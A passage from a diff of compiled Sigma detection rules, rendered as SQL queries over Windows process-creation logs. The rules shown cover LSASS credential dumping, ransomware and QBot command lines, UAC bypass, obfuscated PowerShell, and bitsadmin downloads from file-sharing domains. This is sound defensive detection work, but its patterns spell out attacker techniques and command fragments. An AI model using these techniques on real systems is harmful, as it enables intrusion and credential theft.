"6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.003" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. 
CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_stdin_redirect.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", + "title": "Use of Setres.exe", + "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", + "author": "@gott_cyber", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218", + 
"attack.t1202" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Legitimate usage of Setres" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\setres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\choice' ESCAPE '\\')" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_lolbin_setres.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", - "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "title": "Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "status": "test", + "description": "load malicious registered COM objects", "author": "frack113", "tags": [ - "attack.impact", - "attack.t1486" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND 
CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", - "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = 
'4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1574", + "attack.execution" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR 
CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", - "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", + "title": "Write Protect For Storage Disabled", + "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "author": "Sreeman", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" + "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" }, { - "title": "Suspicious WindowsTerminal Child Processes", - "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", - "status": "experimental", - "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Application Whitelisting Bypass via Dxcap.exe", + "id": "60f16a96-db70-42eb-8f76-16763e333590", + "status": "test", + "description": "Detects execution of of Dxcap.exe", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Other legitimate \"Windows Terminal\" profiles" + "Legitimate 
execution of dxcap.exe by legitimate user" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND 
CommandLine LIKE '% -c %' ESCAPE '\\')" ], - "filename": "proc_creation_win_windows_terminal_susp_children.yml" + "filename": "proc_creation_win_lolbin_susp_dxcap.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to 
install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unlikely" + "Legitimate use of cmstp.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot 
activity by looking for process executions used previously by QBot", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005" + ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE 
'%.tmp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_malware_qbot.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", - "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "status": "test", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1564.004" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE 
'\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "title": "Suspicious UltraVNC Execution", + "id": 
"871b9555-69ca-4993-99d3-35a59f9f3599", "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": 
